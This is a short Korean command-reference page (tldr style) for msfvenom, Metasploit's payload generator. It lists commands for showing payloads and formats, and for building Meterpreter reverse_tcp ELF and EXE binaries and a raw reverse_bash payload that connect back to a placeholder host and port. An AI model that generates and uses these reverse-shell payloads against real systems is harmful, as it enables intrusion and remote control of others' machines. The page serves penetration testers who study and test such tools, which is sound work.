msfvenom
Metasploit의 페이로드를 수동으로 생성. 더 많은 정보: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom.
- 페이로드 목록 표시:
msfvenom -l payloads
- 형식 목록 표시:
msfvenom -l formats
- 페이로드 옵션 표시:
msfvenom -p
페이로드 --list-options
- 역방향 TCP 핸들러로 ELF 바이너리 생성:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=
로컬_IP LPORT=
로컬_포트 -f elf -o
경로/대상/바이너리
- 역방향 TCP 핸들러로 EXE 바이너리 생성:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=
로컬_IP LPORT=
로컬_포트 -f exe -o
경로/대상/바이너리.exe
- 역방향 TCP 핸들러로 원시 Bash 생성:
msfvenom -p cmd/unix/reverse_bash LHOST=
로컬_IP LPORT=
로컬_포트 -f raw